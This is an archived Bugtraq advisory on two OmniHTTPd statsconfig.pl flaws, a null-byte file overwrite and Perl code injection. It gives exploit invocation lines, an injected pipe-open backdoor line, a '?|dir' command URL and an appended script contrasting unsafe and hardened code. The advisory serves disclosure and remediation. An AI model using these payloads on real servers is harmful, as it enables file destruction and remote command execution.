Bugtraq mailing list archives
Vulnerabilities in OmniHTTPd default installation
From: joetesta@hushmail.com
Date: Mon, 15 Jan 2001 17:19:12 -0800
Overview

Two vulnerabilities exist in the 'statsconfig.pl' script that ships with OmniHTTPd v2.07 and is installed by default. The first allows a remote attacker to corrupt any file on the system. The second allows arbitrary Perl code to be inserted into '/cgi-bin/stats.pl'.

Details

Here is the offending code:

    if ($FORM{'mostbrowsers'}) {
        $mostbrowsers_str = '$most_browsers = "' . $FORM{'mostbrowsers'} . '";';
    }
    ...
    unless (-f "$FORM{'cgidir'}/stats.prg") {
        $error .= "<LI>Config couldn't find the file stats.prg in your cgi-bin directory.";
        [ exit(); ]
    }
    ...
    $cgifile  = "$FORM{'cgidir'}/stats.pl";
    $progfile = "$FORM{'cgidir'}/stats.prg";
    open(CGI, "> $cgifile");
    open(PROG, "$progfile");
    print CGI "#!/usr/local/bin/perl5\n";
    print CGI "#AutoConfiged by Statsconfig.pl\n\n";
    print CGI "$deflimit_str\n$mostip_str\n$mostreq_str\n$mostbrowsers_str\n$timelog_str\n$mostipnum_str\n$mostreqf_str\n$mostbrowsernum_str\n$logloc_str\n$imagebar_str\n$serveradd_str\n$barwidth_str\n$barheight_str\n$listpass_str\n$bgcolor_str\n$bgimage_str\n$ttBGcolor_str\n\n$perllib_str\n";
    ...

None of the variables in %FORM are filtered. An attacker simply sets $FORM{'cgidir'} to the absolute path of any file on the system, followed by a null byte so that the appended '/stats.pl' is ignored by open(), and that file is truncated and overwritten. Because absolute file names are used, the attack is not restricted to the drive the web server resides on.

Code injection is achieved by setting $FORM{'mostbrowsers'} to any legal value followed by a semicolon and the payload. The generated line wraps the value in double quotes, so the payload must first close that quoted string; everything after it is then written into 'stats.pl' as Perl source and executed the next time the script runs.

Exploit

I've written an exploit in Perl to demonstrate the two vulnerabilities.

To corrupt a file:

    perl omnismash.pl localhost 80 -corrupt c:/autoexec.bak

The file you choose will be overwritten with approximately 470 bytes of Perl code.

To inject code into '/cgi-bin/stats.pl':

    perl omnismash.pl localhost 80 -inject c:/httpd/cgi-bin

You must pass the absolute path to the cgi-bin directory for this to work. The exploit is hard-coded to insert the following line:

    if( $ENV{'QUERY_STRING'} ) { open( QS,$ENV{'QUERY_STRING'} ); }

With that done, point your browser at 'http://localhost/cgi-bin/stats.pl?|dir'. Because the injected two-argument open() treats a leading '|' as a pipe, the query string is run as a command and you will see a directory listing of '/cgi-bin'.

Solution

Erase 'statsconfig.pl' along with any other unnecessary files in your 'cgi-bin'. If this is not possible in your particular situation, replace your current 'statsconfig.pl' with the attached 'statsconfig.fixed'. This version allows 'statsconfig.pl' to be invoked only from localhost.

Vendor Status

Omnicron Technologies Corporation was notified via <info@omnicron.ab.ca> and <support@omnicron.ab.ca> on Monday, January 8, 2001. No reply was received.
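The following Perl script is an added illustration of both flaws described under Details, placed side by side with hardened versions; it is not part of the advisory, of the attached exploit, or of OmniHTTPd. The base directory '$CGI_BASE', the helper names ('unsafe_cgifile', 'safe_cgifile', 'unsafe_config_line', 'safe_config_line', 'from_localhost') and the form values used for the demonstration are all assumptions constructed for the example.

```perl
#!/usr/bin/perl
# Added example, not code from the advisory or from OmniHTTPd. It reproduces the
# two unsafe statsconfig.pl patterns and shows a hardened form of each.
# All names below ($CGI_BASE, safe_cgifile, safe_config_line, ...) are hypothetical.
use strict;
use warnings;

# Assumption: the server's real cgi-bin. A hardened script fixes this at install
# time instead of reading it from the form.
my $CGI_BASE = 'c:/httpd/cgi-bin';

# --- Pattern 1: the form supplies the directory that open() writes to --------

# As in statsconfig.pl: the value is pasted straight into the path. A trailing
# NUL makes the underlying C open() stop there, so "/stats.pl" is never seen and
# any absolute path on any drive is truncated and overwritten.
sub unsafe_cgifile {
    my ($cgidir) = @_;
    return "$cgidir/stats.pl";
}

# Hardened: allow-list the single directory the installer knows about, and reject
# NUL bytes explicitly so a truncated path can never be built.
sub safe_cgifile {
    my ($cgidir) = @_;
    return undef unless defined $cgidir;
    return undef if $cgidir =~ /\0/;
    return undef unless $cgidir eq $CGI_BASE;
    return "$cgidir/stats.pl";
}

# --- Pattern 2: a form value is pasted into generated Perl source ------------

# As in statsconfig.pl: the value sits inside "..." in the generated stats.pl, so
# a value of the form  5"; <code> #  closes the string and the rest is executed
# the next time stats.pl runs.
sub unsafe_config_line {
    my ($name, $value) = @_;
    return '$' . $name . ' = "' . $value . '";';
}

# Hardened: printable ASCII only, and every character that is special inside a
# Perl double-quoted string (\ " $ @) is escaped. Whatever the input, the output
# is one assignment of a plain string literal.
sub safe_config_line {
    my ($name, $value) = @_;
    return undef unless defined $value && $value =~ /^[\x20-\x7e]*$/;
    (my $q = $value) =~ s/([\\"\$\@])/\\$1/g;
    return '$' . $name . ' = "' . $q . '";';
}

# --- The advisory's workaround: answer only requests from localhost ----------
sub from_localhost {
    my ($remote_addr) = @_;
    return defined $remote_addr && $remote_addr eq '127.0.0.1';
}

# --- Demonstration on constructed form input (not captured traffic) ----------
my %FORM = (
    cgidir       => "c:/autoexec.bat\0",
    mostbrowsers => '5"; open(QS,$ENV{QUERY_STRING}); #',
);

(my $shown = unsafe_cgifile($FORM{cgidir})) =~ s/\0/\\0/g;   # make the NUL visible
print "unsafe path : $shown\n";
print "safe path   : ", (safe_cgifile($FORM{cgidir}) // 'REJECTED'), "\n";
print "unsafe line : ", unsafe_config_line('most_browsers', $FORM{mostbrowsers}), "\n";
print "safe line   : ", (safe_config_line('most_browsers', $FORM{mostbrowsers}) // 'REJECTED'), "\n";
print "localhost?  : ", (from_localhost('10.0.0.5') ? 'yes' : 'no'), "\n";
```

Run as 'perl hardened.pl' (Perl 5.10 or later for the '//' operator). The unsafe line that comes out is a complete second Perl statement after the closing quote, which is exactly what ends up in 'stats.pl'; the hardened line keeps the same bytes but as an inert string. The injected payload itself works only because two-argument open() interprets a leading '|' as a pipe to a command; the three-argument form open(my $fh, '<', $path) never does, which is the other change worth making in any generated script.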
Attachment:
2000.01.08.OmniHTTPd.zip